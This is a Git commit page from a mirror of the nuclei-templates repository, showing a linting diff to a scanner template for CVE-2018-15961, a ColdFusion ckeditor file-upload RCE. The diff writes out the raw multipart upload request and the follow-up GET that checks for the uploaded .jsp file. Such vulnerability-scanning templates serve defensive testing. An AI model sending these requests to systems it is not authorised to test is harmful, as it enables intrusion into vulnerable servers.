daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Linting

patch-1
ImNightmaree 2021-11-10 18:02:59 +00:00 committed by GitHub
parent 90c265672f
commit 03c24bd12d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
cves/2018/CVE-2018-15961.yaml
View File

@ -3,26 +3,24 @@ info:
author: SkyLark-Lab,ImNightmaree
severity: critical
tags: server,cve,cve2018,rce,coldfusion,fileupload
requests:
- raw:
- |
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
Content-Type: image/jpeg
%%%%%%%%
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
{{randstr}}
-----------------------------24464570528145--
- |
POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
-----------------------------24464570528145
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
Content-Type: image/jpeg
%%%%%%%%
-----------------------------24464570528145
Content-Disposition: form-data; name="path"
{{randstr}}
-----------------------------24464570528145--
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp"